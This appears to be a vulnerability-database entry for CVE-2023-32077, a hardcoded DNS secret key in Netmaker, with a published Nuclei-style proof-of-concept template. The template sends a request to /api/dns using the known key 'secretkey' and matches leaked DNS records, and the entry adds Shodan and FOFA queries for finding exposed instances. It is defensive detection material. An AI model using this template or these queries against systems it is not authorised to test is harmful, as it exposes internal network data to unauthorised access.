漏洞描述
Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.
CVE-2023-32077: Netmaker - Hardcoded DNS Secret Key
PoC代码[已公开]
id: CVE-2023-32077
info:
name: Netmaker - Hardcoded DNS Secret Key
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-32077
cwe-id: CWE-798,CWE-321
epss-score: 0.59995
epss-percentile: 0.98215
cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: gravitl
product: netmaker
shodan-query:
- html:"netmaker"
- http.html:"netmaker"
fofa-query: body="netmaker"
tags: cve,cve2023,info-key,netmaker,exposure,gravitl
http:
- method: GET
path:
- "{{BaseURL}}/api/dns"
headers:
Authorization: "x secretkey"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "application/json")'
- 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")'
condition: and
# digest: 4a0a00473045022031a0ffdfbde92f1da1075faf14e1bdfff00a6850bd8479b01c534dc493b97f6b02210095af26fd974a823f717b1e830f0b2825d7a43a2597f3a678695246ec433ee057:922c64590222798bb761d5b6d8e72950